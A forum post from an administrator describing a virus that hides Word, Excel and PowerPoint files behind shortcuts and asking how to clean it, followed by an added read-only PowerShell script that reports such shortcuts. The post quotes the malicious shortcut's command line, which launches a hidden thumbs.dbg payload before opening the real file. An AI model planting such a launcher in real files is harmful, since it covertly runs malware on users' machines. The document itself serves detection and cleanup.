We are experiencing a virus calling itself thumbs.db2 or variant .dbh, or dbP.
It targets Microsoft Office files, seemingly Word, Excel and PowerPoint; hiding the original file, it replaces it with a modified shortcut.
So the original file, called in this instance "Application", is hidden and replaced with a shortcut; this has the properties:
C:\WINDOWS\system32\cmd.exe /C start cmd.exe /C if exist \Immediacy\Training\TrainingPPoint\devleoper\c#\thumbs.dbg start \Immediacy\Training\TrainingPPoint\devleoper\c#\thumbs.dbg && start "" excel.exe "Applications.xls"
Have issued a change to Group Policy to stop CMD from running to limit it spreading.
Reading other forums, it uses an ActiveX exploit spreading by attachment in email, an archive file containing the Word document and fputlsd.dll; ActiveX calls this fake DLL, creates thumbs.db files the detected bn spreads.
Although Symantec can detect the virus and quarantine it, there doesn't appear to be a fix anywhere on other forums, and we are about to post a copy up to Symantec for evaluation.
We are led to believe CA Entrust, Malware Bytes, Kaspersky and AVG are known not to detect it at this time.
If anyone has any further experience or has found a method of cleaning this virus, we would be grateful to hear via the forum.
Dave
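
The shortcut layout described in the post (a .lnk whose target is cmd.exe, starting a thumbs.db? file and then opening the document) can be inventoried without opening anything. The following is an added example, not part of the original post: a read-only PowerShell report of matching shortcuts and whether the document they name is present and hidden. The `$Root` path, the payload-name pattern and the same-folder lookup are assumptions drawn from the names and command line quoted above.

```powershell
# Added example (not from the original post): read-only report, changes nothing on disk.
# $Root is a hypothetical path; point it at the share or folder being checked.
param([string]$Root = 'D:\Shares')

$shell = New-Object -ComObject WScript.Shell

# Assumption: payload names follow the post (thumbs.db2, .dbh, .dbP, .dbg), i.e.
# "thumbs.db" plus one extra character. A plain thumbs.db is not matched.
$payloadRegex = 'if exist\s+(.+?thumbs\.db\w)\s'

$findings = @(
    Get-ChildItem -LiteralPath $Root -Recurse -Force -Filter *.lnk -ErrorAction SilentlyContinue |
    ForEach-Object {
        $lnk = $shell.CreateShortcut($_.FullName)

        # Pattern from the post: target is cmd.exe and the arguments start the payload.
        if ($lnk.TargetPath -match '\\cmd\.exe$' -and $lnk.Arguments -match $payloadRegex) {
            $payload = $Matches[1]

            # The last quoted string in the arguments is the document the shortcut
            # opens afterwards ("Applications.xls" in the post).
            $docName = if ($lnk.Arguments -match '"([^"]+)"\s*$') { $Matches[1] } else { $null }

            # Assumption: the hidden original sits beside the shortcut under that name.
            $doc = $null
            if ($docName) {
                $docPath = Join-Path $_.DirectoryName $docName
                $doc = Get-Item -LiteralPath $docPath -Force -ErrorAction SilentlyContinue
            }

            [pscustomobject]@{
                Shortcut       = $_.FullName
                Payload        = $payload
                Document       = $docName
                DocumentFound  = [bool]$doc
                DocumentHidden = [bool]($doc -and ($doc.Attributes -band [IO.FileAttributes]::Hidden))
            }
        }
    }
)

$findings | Format-List
"{0} suspicious shortcut(s) under {1}" -f $findings.Count, $Root
```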